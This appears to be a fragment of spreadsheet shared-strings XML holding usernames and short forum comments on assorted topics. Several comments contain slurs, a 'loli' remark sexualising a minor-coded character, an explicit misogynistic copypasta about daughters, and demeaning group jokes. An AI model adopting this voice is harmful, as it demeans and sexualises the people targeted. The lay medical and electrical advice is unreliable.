    <t>His most famous example, the ex leader of the KKK, is going to prison because he shot at a black man at the unite the right rally last year, while screaming "die n.gger". Darryl's method is, in fact, a complete failure.</t>
  </si>
  <si>
    <t>theslothening</t>
  </si>
  <si>
    <t>Destroyed him? With the ramblings of an utter lunatic? He only asked him like 2 questions during the entire 5 minutes.</t>
  </si>
  <si>
    <t>Siobhanma</t>
  </si>
  <si>
    <t>I had a wee bit of brown discharge yesterday and today still some it’s not enough to cover a tissue but it’s worried me. I had DNC in May but when I had that miscarriage it was loads of bright red blood. This is light brown discharge only when I wipe sometimes it’s not heavy. I’m on holiday but will get back in 2 days should I be worried ? I have no pain along with it</t>
  </si>
  <si>
    <t>_Lempa_</t>
  </si>
  <si>
    <t>I did exactly that. Thanks for the suggestion</t>
  </si>
  <si>
    <t>SkyLETV</t>
  </si>
  <si>
    <t>Hey, if the loli strips on her own then she's fine with those "clothes".</t>
  </si>
  <si>
    <t>Papantro</t>
  </si>
  <si>
    <t>hi earl</t>
  </si>
  <si>
    <t>NimbleBodhi</t>
  </si>
  <si>
    <t>&gt; People have chosen their sides. Indeed, tribalism has won and the individual thought has been thoroughly suppressed... very sad :(</t>
  </si>
  <si>
    <t>G34R_G4M1NG</t>
  </si>
  <si>
    <t>Thanks man I’d say it’s maybe my 15th or 20th. Honestly when it comes out chunky I just do a second layer on the same area or just try to remove it and start again by reapplying. Also no I haven’t used the sanding technique yet, I don’t think it’d really work due to their size. Appreciate it though man post your Bulbasaur once it’s done can’t wait to see it.</t>
  </si>
  <si>
    <t>Tracey</t>
  </si>
  <si>
    <t>One of the most comfortable shoes I've purchased! Stylish and can handle my walking to/from work and being on my feet all day. I should've bought two!</t>
  </si>
  <si>
    <t>LiberDBell</t>
  </si>
  <si>
    <t>I've done like 15 minutes of 2 minute queues.. nothing. I would understand if it was Ranked at this time of the day, but damn I'm just searching for a casual.</t>
  </si>
  <si>
    <t>dc912</t>
  </si>
  <si>
    <t>Not all Republicans are bad. It just so happens that most of the Republicans in office seem to owe their allegiances elsewhere...</t>
  </si>
  <si>
    <t>__asamara__</t>
  </si>
  <si>
    <t>Saudi Arabia isn't an Islamic caliphate. It doesn't claim to run upon Shari'ah. You making up something. It's an absolute monarchy with arbitrarily "laws".</t>
  </si>
  <si>
    <t>J4c0br0s3</t>
  </si>
  <si>
    <t>thanks</t>
  </si>
  <si>
    <t>ting_bu_dong</t>
  </si>
  <si>
    <t>Because &gt; Nobody ever wants to discuss population. Ask yourself: why is that? I mean, *that's why.* That's why nobody wants to discuss that. Because eugenics.</t>
  </si>
  <si>
    <t>DominaMax</t>
  </si>
  <si>
    <t>Just jam it on in there.</t>
  </si>
  <si>
    <t>kemeti</t>
  </si>
  <si>
    <t>Man wish I saw this earlier..day 0..I’m hate restarting! **** this I’m going to quit this shid</t>
  </si>
  <si>
    <t>HoosDare</t>
  </si>
  <si>
    <t>No need to sugarcoat it. He slapped her then raped her.</t>
  </si>
  <si>
    <t>stressedworm123</t>
  </si>
  <si>
    <t>Supernatural. First episode and 2 people already died. It was the start of a tragic story.</t>
  </si>
  <si>
    <t>Demon Of The Fall May 1, 2004 Nap Ghost</t>
  </si>
  <si>
    <t>westom</t>
  </si>
  <si>
    <t>You had damage because you have not (yet) learned this stuff. Best evidence is always in the dead body. Open it up to start learning why damage happened. And to learn a human mistake that made that damage possible. Start with what we know. Lightning is a connection from a cloud (ie three miles up) to distant earthborne charges (ie four miles distant). It does not go five miles across the sky. It does down to earth and then through earth to those charges. Protection of a structure means that current is not anywhere through that structure. Franklin demonstrated that. He connected direct lightning strikes to an earth ground electrode on a path that remained outside. Since that hardwire was more conductive, then a surge was not passing destructively through wood. Protection of appliances means that current is not anywhere inside a building. All over the world, facilities that cannot have damage connect direct lightning strikes to an earth ground electrode on a path that remains outside (ie at the service entrance). If that hardwire is more conductive (ie low impedance), then a surge was not inside hunting for earth ground via any appliance. TV cable already has that connection installed for free - as required by codes. Telephone wire cannot connect directly to the earth ground electrode. So a protector (installed for free by the telco) makes that connection (also required by codes). That protector is only doing what the TV cable's hardwire does better. Connect surges (ie direct lightning strikes) harmlessly outside to earth. That means a connection from cloud to distant earthborne charges is not anywhere inside. Effective protection exists. However, AC electric wires (the most often struck) are not required to have effective protection. So a lightning strike, many blocks down the street, is a direct strike incoming to all household appliances. Are all damaged? Of course not. Electricity only flows when it has both an incoming and a separate outgoing path. Incoming to everything. But a best outgoing path many be via telephone or TV cable wires. Those make connections to earth (and therefore to distant earthborne charges). So those protect other appliances. That surge was inside. It found a best connection to distant changes maybe via a router. Damage is often on the outgoing path. Inspecting router damage may confirm that. Solution is to connect incoming AC electric wires to earth. Since they cannot connect directly, then informed homeowners properly earth one 'whole house' protector in the breaker box or meter pan. That protector typically costs about $1 per protected appliance. And is the only solution that will protect everything (ie even garage door opener). It also comes with numbers that say effective. Lightning is typically 20,000 amps. So a minimal 'whole house' protector is 50,000 amps. Effective protectors do not fail for many decades after many direct lightning strikes. And cost less money. THE most critical point. No protector does protection. Not one. An effective protector is a connecting device to what does protection - earth ground. And that connection must be low impedance (ie less than 10 feet long, hardwire has no sharp bends or splices, wire is not inside metallic conduit, etc). How to increase protection? Upgrade earth ground to exceed what code requires. More electrodes are one solution. Shorter hardwire from protector to electrodes is another. Effective routine protection always answers this question. Where do hundreds of thousands of joules harmlessly dissipate? Effective protection always means a low impedance connection to what does all protection - single point earth ground. Protectors only used when a hardwire alone cannot make that connection to earth - and those distant earthborne charges. Then best protection already inside every appliance (and router) is not overwhelmed.</t>
  </si>
  <si>
    <t>General-USA</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>Vogonfestival</t>
  </si>
  <si>
    <t>That’s me encouraging OP to go find a team to help execute the idea. I think that’s the next step.</t>
  </si>
  <si>
    <t>Vurondotron</t>
  </si>
  <si>
    <t>He’s right, you guys act much worse or act the same way towards criticism like people who are fans of Nintendo. I love Xbox and have stood by them since 2011 and stood by their failures by not getting a PlayStation even when things at Xbox were rough especially the early years of 8th generation. Ever since Phil took over he’s basically been saying that they need to fix this or that when it comes to their games and 5 YEARS LATER!! They haven’t delivered on his promises fast enough or better yet good enough where Xbox is taken as a joke to some. Yes they did good by acquiring studios and making a new studio but they did that too late into the generation. Overall I’m hoping they do better next generation.</t>
  </si>
  <si>
    <t>spekt50</t>
  </si>
  <si>
    <t>A close call like this made me give up riding for good as well. It's only getting worse as so many people are distracted while driving as of late. It's shocking how many times I see people on their phones during my commute to work.</t>
  </si>
  <si>
    <t>nakdamink</t>
  </si>
  <si>
    <t>Also, going to the store yourself for a single item sucks. If you already are paying someone to make your life easier and help keep track of things, that Imodium run is very much in their job description.</t>
  </si>
  <si>
    <t>SubwayWifi</t>
  </si>
  <si>
    <t>Thanks for blessing me with those rare finds my man!</t>
  </si>
  <si>
    <t>thelittlestlibrarian</t>
  </si>
  <si>
    <t>Yeah, what's this new no headphones/my phone is a speaker thing? Calls too. Speakerphone everywhere now. You're on a crowded bus, do you really want this call to be on speaker? I recall the first bliss of having my own private listening space and I can't fathom just blasting out to everybody.</t>
  </si>
  <si>
    <t>geffe71</t>
  </si>
  <si>
    <t>No, you have to stick by the doors they drive up to. Because it’s TV, there is nothing like the Superstar Experience because many of the talent are in meetings with agents and producers or are wisked away last minute for meetings. Live events you would have a better chance</t>
  </si>
  <si>
    <t>ScienceofFish</t>
  </si>
  <si>
    <t>You could buy that in case you plan on upgrading in future. Having a filter that already has bacteria will save you time in transferring your fish to the new tank</t>
  </si>
  <si>
    <t>tom641</t>
  </si>
  <si>
    <t>but the gun isn't yes I know there's lore reasons but it's a fucking gun</t>
  </si>
  <si>
    <t>Ipecactus</t>
  </si>
  <si>
    <t>&gt; Since you clearly don't know, it's a logical fallacy to point out a grammatical mistake in order to disprove an argument. I wasn't attempting to disprove an argument.</t>
  </si>
  <si>
    <t>vorticalbox</t>
  </si>
  <si>
    <t>Takes two strong will powered people to make that work so congrats</t>
  </si>
  <si>
    <t>stefblog</t>
  </si>
  <si>
    <t>Good luck selling to elite scientists the idea of unintended consequences. Those people will never agree they can be wrong in any way.</t>
  </si>
  <si>
    <t>KJ_TN</t>
  </si>
  <si>
    <t>I grew up in West TN and we always spent 2-3 hours at visitations catching up with family and friends. Moved to the Nashville area and now I stand in line for 30 minutes, say sorry for your loss, maybe a hug, then leave.</t>
  </si>
  <si>
    <t>chillbobaggins77</t>
  </si>
  <si>
    <t>I cannot think or comprehend of anything more cucked than having a daughter. Honestly, think about it rationally. You are feeding, clothing, raising and rearing a girl for at least 18 years solely so she can go and get ravaged by another man. All the hard work you put into your beautiful little girl - reading her stories at bedtime, making her go to sports practice, making sure she had a healthy diet, educating her, playing with her. All of it has one simple result: her body is more enjoyable for the men that will eventually fuck her in every hole. Raised the perfect girl? Great. Who benefits? If you're lucky, a random man who had nothing to do with the way she grew up, who marries her. He gets to fuck her tight pussy every night. He gets the benefits of her kind and sweet personality that came from the way you raised her. As a man who has a daughter, you are LITERALLY dedicating at least 20 years of your life simply to raise a girl for another man to enjoy. It is the ULTIMATE AND FINAL cuck. Think about it logically.</t>
  </si>
  <si>
    <t>xxXWEED_WIZARDXxx</t>
  </si>
  <si>
    <t>How is such a country in the EU?</t>
  </si>
  <si>
    <t>kiwijw</t>
  </si>
  <si>
    <t>Hi guys, Last Sunday Simon &amp; I headed back to the area where we were at a month ago where I had a some success with the Zed &amp; X coil 10 x 9 We just carried on from where we left off last time all be it over ground I have hammered over the years &amp; even with Simon we have been over it numerous times. Simon with different detectors &amp; me with the Zed &amp; ML 14" coil but not the X coils this far over. Simon was back on his 4500 &amp; NF Evo coil but he knocked his sensitivity down to 13 to try to eliminate getting so many shot gun pellets. Seemed to work well for him, so on this rare occasion I got more than him. My first signal wasn't too long in coming. I was targeting the cracks &amp; drop off shelf areas where there is usually a crack that gold could have dropped into. First signal was at the base of just such a little ledge drop off &amp; schist fracture in the bed rock. note the grass growth. This isn't usually like this but I don't think the sheep are are allowed to graze in here any more. I said to Simon that if this is the case then detecting in here will get impossible as the grass really takes hold &amp; makes it impossible to get the coil on to the ground &amp; of course the grass loves the cracks &amp; crevices where the roots can take hold in the deeper ground. The signal had moved &amp; was in that crack. Small though. But no catch &amp; release. Carried on &amp; a 2nd signal came in exactly the same type situation. A little schist drop off ledge. I actually wish I took a picture from when I first got the signal before disturbing the ground. So you could have worked out the depth. But I scraped away the dirt until I was down to the lower ledge of the schist bedrock before taking a picture. You can see where the height of the dirt was. Virtually right up to the top of that bedrock where the moss &amp; lichen is growing. Note too the little crevice coming to light. The signal was booming but still down in that crack. I had the pointy end of the pick as far as it would get into that crack &amp; the signal was still down in there. I just knew it was going to be gold. I looked around for a long thin stick but no joy there. In a last ditch effort I positioned the pick with the handle 90 degrees to that rock face, which gave me the narrowest part of the pick to drag sideways along the crack to try to move the target. It wasn't easy but I finally managed to move it &amp; get it out. It made me work for it but bingo. Out it was. I could have sworn for the depth of the original signal that it was going to be bigger than that. Again on the edge of a schist drop off I got another signal. Note how the grass favors those schist crevice areas of deeper ground. Again in the corner edge at the bottom of that drop off. Another sassy bit of gold. No record breakers. I then hit a shot gun pellet grave yard which was driving me nuts. Pellet after damn pellet. One scrape &amp; they had moved. I should have known better than to persevere with those type signals. Another signal, one scrape &amp; it had moved. I hesitated about retrieving this one, but I did. And was rewarded for doing so. Smaller than a pellet even. At this point Simon came up to have a look &amp; to swap over to his Nox 800. He lasted about 10 minutes with that as the pellets drove him crazy. He went back to the 4500 &amp; manged to snag a bit of gold. I wandered away &amp; had a bit of a dry spell. I was hoping for another piece before I stopped for a coffee break &amp; a bite to eat. It took a while to come &amp; we were having the old sleety/rain showers coming through. When I got a nice little signal. It was down a wee bit &amp; ended up being in a little hollow in the schist bed rock. It didn't take long for the little hollow to fill with water as it was in a natural small gutter run off. Hence why I detected down this little depression in the ground. Small bit of gold it was. Well...not the smallest of the day. I then stopped for my well earned coffee. While having my coffee I checked my phone, which was very iffy with its signal. Blow me down, a message from Steve H. So I gave a quick reply stating what Simon &amp; I were up to. I had 5 bits at this stage &amp; Simon one. Simon at this point wandered up for a coffee &amp; a bite to eat as well. After our break I headed down to where Simon had started detecting. I saw a lot of over turned rocks &amp; slabs of schist. Just below one of his area I got a good little signal. You will notice up the right edge of the photo turned over slabs of schist from Simon. I was detecting those two cracks you can see with the grass growing in them. No surprise to me that I got a signal at the start of that one where the detector is. It wasn't a bad piece either. My biggest for the day. Simon saw me taking photos &amp; asked if I got one there. I replied that I had &amp; he came down to see if it was an area he had been over &amp; hadn't got. I think he was satisfied he hadn't detected that spot. My reply was, Why not? Considering those cracks were right there. Any way. That was the last one for along spell. I did get one more but no pic of that. We called it quits as we had a bit of a walk to get back to Simon's vehicle. Due to the damp conditions, Simon's vehicle wasnt ideal to have brought in here. We had to park up further back from where we would normally. The wet conditions had made the glacial silt like grease &amp; we had actually pushed his vehicles limits getting to where we did. Despite being 4 wheel drive his tires weren't up to it. On the way out we slipped of the track into the gutter. with me pushing we managed to get back on the track &amp; it was a very slow slippery drive back to the main road &amp; getting dark. We made it. Whew So all up for the Zed &amp; X coil 10 x 9 was 7 little bits for not even one gram. This is my total of all detected gold from this area over the years. Just over two ounces &amp; hundreds if not thousands of little pieces. The bigger bits seemed to have swum to the top. My pellet total that I brought home. There were many that I threw away down into no mans land that would never see a detector. Cheers. Good luck out there JW 🤠</t>
  </si>
  <si>
    <t>shameless57</t>
  </si>
  <si>
    <t>Lol how the fuck does this have 19k upvotes. People seriously think a democratic senator in a majority Republican Senate has more ability to get a law passed than the POTUS? Clown tweet.</t>
  </si>
  <si>
    <t>Simoes147</t>
  </si>
  <si>
    <t>thought you were talkin about 2000$ pc</t>
  </si>
  <si>
    <t>XavierMendel</t>
  </si>
  <si>
    <t>Huh, I didn't realize I was in /r/politics. I could've sworn with was a nonpolitical subreddit talking about cartoon pirates and *not* modern American issues. Silly me.</t>
  </si>
  <si>
    <t>Ninevehwow</t>
  </si>
  <si>
    <t>That sweet Liz Frank unicorn trapper keeper I lusted after but never got in the fourth grade.</t>
  </si>
  <si>
    <t>mrkennethmasters</t>
  </si>
  <si>
    <t>I wonder if he’s training for the fourth matrix movie?</t>
  </si>
  <si>
    <t>loveme_33</t>
  </si>
  <si>
    <t>Always! Thanks for the positivity! Builds a good character too!</t>
  </si>
  <si>
    <t>_TCG_</t>
  </si>
  <si>
    <t>Yeah I contacted support before I went to bed and when I woke up to go to work they said that they want me to send them a log report. Little hard to do right now when I’m currently at work so once I get home “on my Friday today thank god” I’ll set up my VR and do what I have to in order to send them a report.</t>
  </si>
  <si>
    <t>toastofxmaspast</t>
  </si>
  <si>
    <t>I think they kid themselves about it’s permanence. I think a lot of women convince themselves that if they could find the right magic diet or workout regiment they’d magically go back to exactly how they were prebaby</t>
  </si>
  <si>
    <t>bl0odredsandman</t>
  </si>
  <si>
    <t>You don't have to hold it at shoulder height to use your thumb to turn it on. You can hold it between your index finger and middle finger like you're holding a cigar and press the tail switch with your thumb. That's literally called the cigar grip. It's comfortable to use it that way and one of my favorite ways to use a tail switch light. You can also grip the light in your hand and just rotate your wrist so the light is pointing forwards and then hit the switch with your thumb. One main reason tail switches are popular is because many tail switches allow you to momentarily turn on the light without depressing the switch all the way. Once you release the switch, the light turns off. There are not many side switch lights that have momentary features. There are some, but not many.</t>
  </si>
  <si>
    <t>Hi! Just a note that you cannot add personal information like numbers, emails, kik usernames, user profiles, and usernames/messenger names in comments or body of post :( You are more than welcome to PM that information! In general, if you avoid discussion of usernames, accounts, and messaging services you should be able to avoid triggering this response. If you prefer non-Reddit communication, it's best to just say so, rather than listing any external messaging services. If this is a false positive and there isn't personal information in your post please do not delete the message and instead [message the moderators](http://www.reddit.com/message/compose?to=%2Fr%2Fr4r). Thank you! Code: 3 *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/r4r) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>LawUntoChaos</t>
  </si>
  <si>
    <t>It's almost as if there are both decent people *and* assholes in the world. These two dichotomies can also often be seen in the same people. One person's asshole is another person's angel.</t>
  </si>
  <si>
    <t>Prancer is coming</t>
  </si>
  <si>
    <t>I loved the last one and got totally sucked in. Usually a, not a big tv watcher. I think Steve’s story is an interesting one and would like to know more about him.</t>
  </si>
  <si>
    <t>whichonespinkterran</t>
  </si>
  <si>
    <t>The big thing here to notice in the bowlers, Patto has performed in both innings, at the start when it was green and after its flattened out a little.</t>
  </si>
  <si>
    <t>Blue Til Death</t>
  </si>
  <si>
    <t>Mrs Death loves this show, I've seen about 20 mins of one episode and as far as I can tell, it's just a souped up Big Brother with fewer ugly cunts making cunts of themselves .... !</t>
  </si>
  <si>
    <t>ionic7</t>
  </si>
  <si>
    <t>Can confirm, wish it did here.</t>
  </si>
  <si>
    <t>HellOnHighHeels94</t>
  </si>
  <si>
    <t>NOOOOOOOOOOOOOOOO YOU CANT DO THAT TO HER SHE DOESNT DESERVE IT</t>
  </si>
  <si>
    <t>SukaBlyad101</t>
  </si>
  <si>
    <t>I cant wait to piss of feminists by putting my legs over the restraints</t>
  </si>
  <si>
    <t>Pipsta</t>
  </si>
  <si>
    <t>These are delicious and particularly if done on the barbecue. Have also done them in the oven. They're a little fatty but cooked right on a rack/barby, they are delish!</t>
  </si>
  <si>
    <t>Pue-x</t>
  </si>
  <si>
    <t>Too pretty to ride. Love em.</t>
  </si>
  <si>
    <t>Mystery-Flute</t>
  </si>
  <si>
    <t>I have 1 question for you. Is 3 houses a player phase or enemy phase game? Thanks.</t>
  </si>
  <si>
    <t>kingmidget_91</t>
  </si>
  <si>
    <t>southern united states</t>
  </si>
  <si>
    <t>Sirmeikymiles</t>
  </si>
  <si>
    <t>Against Sub Zero and Jade (without glow) you can catch them with air fireball from the distance, when near I think you can punish them with flying kick.</t>
  </si>
  <si>
    <t>sifridstatten</t>
  </si>
  <si>
    <t>It's not your fault it's this way, but it is your fault what you do about it. Don't punish the worker, talk to congress.</t>
  </si>
  <si>
    <t>Because you can't stop a rape with another rape. But I CAN stop a mass shooting with a firearm of my own, IF I'm allowed to carry it. Vermont has one of the lowest intentional homicide rates in the entire country and surprise surprise, Vermont also has constitutional concealed carry.</t>
  </si>
  <si>
    <t>AWS1022</t>
  </si>
  <si>
    <t>Niteshift48 said: ↑ Too much inexperience and too many brand new players to expect much this season. Qb has not thrown more than a handful of passes. Leading tackler on defense wasn't even a starter last year. Defense wise the d line wore down last year and lacks depth. New safety this year and new starting corner. Poor fg kicking. Poor special teams. No go to wide receiver and new running back. Lost 3 starters on o line which wasn't very good anyway. I'm happy with 7-5. Click to expand... And it’s a shame no other team in the nation lost anyone...that makes it really tough for us year after year being the only program that loses players and have to bring in new ones.</t>
  </si>
  <si>
    <t>RogerSterlingsFling</t>
  </si>
  <si>
    <t>If it makes you feel any better the last time the springboks were this confident leading into an All Black Test they lost by 50 odd points</t>
  </si>
  <si>
    <t>thedayofthethreeMagnums</t>
  </si>
  <si>
    <t>The ones that do give me the rage are the idiots speeding in town and in front of a school, especially when the lights are flashing. Twats. Middle lane hoggers. There's a special place in hell for those.</t>
  </si>
  <si>
    <t>benpicko</t>
  </si>
  <si>
    <t>The UK for doing something that neither of the other sides want and that they know will cause a hard border?</t>
  </si>
  <si>
    <t>I don't know who the least racist person on the planet is, but I doubt it's someone who called a Latina woman "Miss Housekeeping" or said a judge couldn't be impartial because "he's Mexican". Donald Trump also said no one respects women more than he does. I don't know who the #1 woman-respecter is either, but I'm guessing it's someone who has *not* said "grab 'em by the p***y" or "women: you have to treat them like sh!t". Basically, the better Donald Trump claims to be at something, the worse he actually is at it. It's the Law of Inverse Trumpability.</t>
  </si>
  <si>
    <t>Gnostic28</t>
  </si>
  <si>
    <t>I’ll be waiting ;)</t>
  </si>
  <si>
    <t>The_PandaKing</t>
  </si>
  <si>
    <t>E.g. Crystal of Meilyr, can't find any use for it and it costs 500k from the same person that sells the crown</t>
  </si>
  <si>
    <t>4agreements</t>
  </si>
  <si>
    <t>Projection? We get it, you’re hurting but blaming is exactly what,the entire post was about. You just aren’t there yet. Not healed enough to know it’s not about you. It’s ok. You’ll get there. Trying to make yourself feel better by spewing shit Isnt going to help you heal. It’s not all about you and you thinking it’s someone else’s job to make you happy. Educate,yourself, remember everyone hurts.</t>
  </si>
  <si>
    <t>bizwig</t>
  </si>
  <si>
    <t>Warp gods and Chaos gods aren’t the same thing. The Chaos gods are thoroughly corrupt. Warp gods like Isha and, presumably, the hypothetical Emperor are not. Lorgar is the eternal slave of Chaos. He is incapable of returning to the Emperor, and even if he could he’s too morally compromised to consider it for even a second.</t>
  </si>
  <si>
    <t>Andy_J05</t>
  </si>
  <si>
    <t>For a split second, I thought I saw a Jeff Gordon throwback (2001 Firestorm). This is amazing. *Proceeds to click save.*</t>
  </si>
  <si>
    <t>Buttersstotch18</t>
  </si>
  <si>
    <t>We missed out badly actually. We did food there once but spent so much time at the parks that we didn't again. I heard their breakfast is so good. Perhaps next time we go we'll make a stop over there for a meal.</t>
  </si>
  <si>
    <t>RSWikiLink</t>
  </si>
  <si>
    <t>I found 2 RuneScape Wiki articles for your search. **[Celestial dragons](https\:\/\/runescape\.wiki\/w\/Celestial\_dragons)** | https://runescape.wiki/w/Celestial_dragons &gt;Celestial dragons are modified white dragons that use temporal abilities to stun their opponents. They can be found in the Dragontooth Island resource dungeon after the One of a Kind quest is complete or within the Dragonkin Laboratory. **[Frost Dragons](https\:\/\/runescape\.wiki\/w\/Frost\_Dragons)** | https://runescape.wiki/w/Frost_Dragons &gt;Frost dragons reside in the Asgarnian Ice Dungeon resource dungeon. The dungeon requires a minimum level of 85 Dungeoneering to access, and inside are a total of 12 dragons. Frost dragons attack with all three combat styles, as well as with dragonfire. The dungeon can be accessed easily by using the fairy ring network with the combination aiq. --- **^^^RuneScape ^^^Wiki ^^^linker** ^^^| ^^^This ^^^was ^^^generated ^^^automatically. ^^^| ^^^View ^^^me ^^^on ^^^[GitHub](https://github.com/zpoon/runescape-wiki-reddit).</t>
  </si>
  <si>
    <t>Reged</t>
  </si>
  <si>
    <t>And this is your target, in a table that assumnes you are the only winner it has to be said! Championship Promotion tictacman1 - - Dublo Seven 7.25 - Charlton2005 9.24 - Wonder Boy 10.55 - uptheboro 10.68 - general custer 17.05 5.38 mymumsfinethankyou 18.33 6.66 Pepe the Frog 20.17 8.5 MOB 22.33 10.66 One Punch Wobbly Bob 28.51 16.84 Uffa Fox 29.05 17.38 lead on 29.76 18.09 DFCIRONMAN 32.26 20.59 Billposter 33.34 21.67 de44ek4 34.51 22.84 Shanelee1966 34.72 23.05 raspberrybottom 37.35 25.68 Basil_the_don 40.01 28.34 hong kong fooey 41.01 29.34 swift-tuttle 41.63 29.96 youresomean 44.26 32.59 custardcream64 45.01 33.34 Da Special 1 45.01 33.34 undecided 45.01 33.34</t>
  </si>
  <si>
    <t>trollcitybandit</t>
  </si>
  <si>
    <t>How many planets do we know for sure have no life on them?</t>
  </si>
  <si>
    <t>EvaderDX</t>
  </si>
  <si>
    <t>Wants to get the invite to Bo's party</t>
  </si>
  <si>
    <t>Cambam71</t>
  </si>
  <si>
    <t>Yeah for the most part. A lot of my pieces are controllable - sans Trout ($70) and Harper ($46). I have a decent makeup of pitchers but no true studs (Thor and Carrasco)</t>
  </si>
  <si>
    <t>flat10squirrel in Mississauga</t>
  </si>
  <si>
    <t>I had water coming from my furnace. Jerry called and told me he was on his way. Apparently the water was condensing and my spout was plugged. The spout for drainage was plugged and had to be flushed out. I didn't even know this was a maintenance matter. Very informative, polite and professional. Signed up for the AC maintenance program. Pleased all around.</t>
  </si>
  <si>
    <t>CUBE</t>
  </si>
  <si>
    <t>Was playing zenyatta and i couldn’t primary fire. All other abilities worked fine. I tried clicking mouse in options to see if it was damaged and it worked fine. When i respawned i could fire normally again.</t>
  </si>
  <si>
    <t>kobebrennan1</t>
  </si>
  <si>
    <t>My eyes dont focus with anxiety is this normal</t>
  </si>
  <si>
    <t>sh_t72</t>
  </si>
  <si>
    <t>Yup! ( I know we didn’t do that here. But fuck it, the end is near! )</t>
  </si>
  <si>
    <t>Csg363</t>
  </si>
  <si>
    <t>Found the low skilled player who can't overcome RNG and makes excuses</t>
  </si>
  <si>
    <t>WitnessMeIRL</t>
  </si>
  <si>
    <t>Volusia County lol. 7 time White Trash capital of the world.</t>
  </si>
  <si>
    <t>SteakPotPie</t>
  </si>
  <si>
    <t>I'm outta the loop, what'd she do?</t>
  </si>
  <si>
    <t>StopBeingAWeisgarber</t>
  </si>
  <si>
    <t>Nothing like holding a new pair of shoes in hand for the 1st time</t>
  </si>
  <si>
    <t>WeslePryce</t>
  </si>
  <si>
    <t>I think Galad had every reason to fight, already being behind enemy lines with the foxhead, and seeing his brother die, but the narrative had no reason for his death to happen, so it didn't. If he had died, it would have just been throwing on more blood for the sake of it, but if he hadn't fought, it would have been un-Galad to the utmost degree. Also Galad's fight with Demandred was totally badass, Galad crushed it.</t>
  </si>
  <si>
    <t>VietKongCountry</t>
  </si>
  <si>
    <t>Definitely doing this with no walk through the first time but I’m just wondering whether to try and get absolutely everything on a blind run or just get through it then go for a perfect file later. I have a tendency to max everything in RPGs and I don’t want to waste time levelling more than necessary or anything if I’m going to be missing things that can’t be achieved later on. Basically wondering whether to just do a blind run to beat the game and then later get all OCD with it on a separate file using a walkthrough or to go all out first time around. Anyone who’s really familiar, which would you recommend? Gonna do the other Quintet RPGs for sure either before or after but Terranigma really seems something special I’m likely to end up maxing out so I’m looking for a little guidance. If there are multiple endings or anything that requires a bunch of play throughs then I’ll probably get really familiar with the game before I invest unreasonable amounts of time into getting a ridiculously overpowered file. TLDR- if I want a “perfect” Terranigma file can I play it blind to the end then get everything later or are the branching paths, missable sections, etc.?</t>
  </si>
  <si>
    <t>stallisfolife</t>
  </si>
  <si>
    <t>The town I work in is rural so I don't know how exciting it would be lol But the freedom would be nice! But yeah paying off the debt first would be a weight off my shoulders.</t>
  </si>
  <si>
    <t>SunnyBunchy</t>
  </si>
  <si>
    <t>My sister has a 17 year old and a 1 year old. I wonder if I can get my niece to do this to mess with people.</t>
  </si>
  <si>
    <t>blankstare666</t>
  </si>
  <si>
    <t>100 a day? That’s terrible. I was told about an instance where i went inside kfc &amp; bought lunch for the person giving me a ride &amp; myself. She waited in the car as we ordered it to go. She said as soon as I walked out the door she knew something was wrong, I got in her car / shut the door and didn’t say a word. I was really confused when I came to in her driveway with our order in my hand. My last memory was waiting for my order after I purchased it.</t>
  </si>
  <si>
    <t>salmorejoboi</t>
  </si>
  <si>
    <t>This is like the funniest reply I’ve ever gotten</t>
  </si>
  <si>
    <t>brad1-8tsi</t>
  </si>
  <si>
    <t>@Bargain80: If I pay $100 to fill my truck and claim it at the company tax rate of 30% then hasn't it still cost me $70? I'm not self employed these days but have been and you try sending a bill for some jabberjaw that has kept you talking for an hour wanting to know the ins and outs of a ducks bottom for a simple job that takes 10 minutes. There's a lot of unbillable hours when you are self employed.</t>
  </si>
  <si>
    <t>Lerk409</t>
  </si>
  <si>
    <t>Can you give us an example? Is he making them in general or making them to you as comments on your photos or something? Ultimately he’s not going to change unless you tell him it makes you uncomfortable so you have to have the conversation.</t>
  </si>
  <si>
    <t>Pyjalal</t>
  </si>
  <si>
    <t>Fun fact : Qur'an has less violent verses than the Bible and the Torah and also the anti-Semitism comes from Jews rule the world conspiracies which are sadly popular among Muslims.</t>
  </si>
  <si>
    <t>flappers87</t>
  </si>
  <si>
    <t>&gt; Let's say a nation in the EU27 goes spare, descends into civil war. That's an absolutely massive jump to argue against the idea. Besides, even if there were, it would not be an issue for the EU to take care of, that's a domestic issue. If a country in the EU would go full on in civil war, do you think the US would jump in to try and save the day? They wouldn't, just how the EU wouldn't either, because it's a domestic problem. If the governments there were somehow breaking EU law, then there would be sanctions. &gt; Sierra Leone was a right clusterfuck with an ineffectual UNAMSIL "Peacekeeping Force" Literally no comparison to what the whole idea behind the EU defense is. &gt; The UN had been arsing about for months Again, completely different organization with a different agenda. What you're failing to understand is what I wrote, and what the whole point of the collective military idea is about. &gt; But then go to far the other way and you have 26 countries narrowing their eyes at the German/British/French Commander who has executive power over a subset of their personnel. You went far away with your first idea, this literally goes against everything what was written. What you're saying in that last one is that the EU would act like Hitler. Which throws away any credibility that you may have had, out the window.</t>
  </si>
  <si>
    <t>ImTheBasketball</t>
  </si>
  <si>
    <t>I was at this game! I was only 10, but I still remember Calvert Chaney missing the buzzer beater that would have won us the game.</t>
  </si>
  <si>
    <t>when trains in America are falling off the tracks left and right. the schools need books in some cases heat.people talk about welfare here in the states . it does not compare to Israel. 10 yrs 10 billion wtf. they give us NOTHING ?! DONT SAY GODS CHOSEN BULLSH!T. Quoting: Anonymous Coward 1501352 Dude, wake up. USA gives Israel much more than a billion dollar every year. USA has a 700 billion defense budget which fights endless middle east wars on behalf of Israel.</t>
  </si>
  <si>
    <t>LeatherAddictM</t>
  </si>
  <si>
    <t>Because I have always wanted a big lambskin bag... Also lambskin is a lot cheaper compared to cowhide. I have never made a bag this complex before, I'm worried about messing it up.</t>
  </si>
  <si>
    <t>coilgod</t>
  </si>
  <si>
    <t>Made my day , but could you return my bow tie please lol, I think I have the same one. He looks better</t>
  </si>
  <si>
    <t>Not_Ice_frog</t>
  </si>
  <si>
    <t>Boomers go by feeling, not thought. Can't be compared to their kind.</t>
  </si>
  <si>
    <t>lisarkaye</t>
  </si>
  <si>
    <t>Today was first day back at work and no feeds...I’m so lost! I’m seeing a lot of comments about the field trip and voting—have we learned more about it?</t>
  </si>
  <si>
    <t>demonictoaster</t>
  </si>
  <si>
    <t>Player manages to train and play golf all in the space of 24 hours, more at 11</t>
  </si>
  <si>
    <t>ConnieBoii</t>
  </si>
  <si>
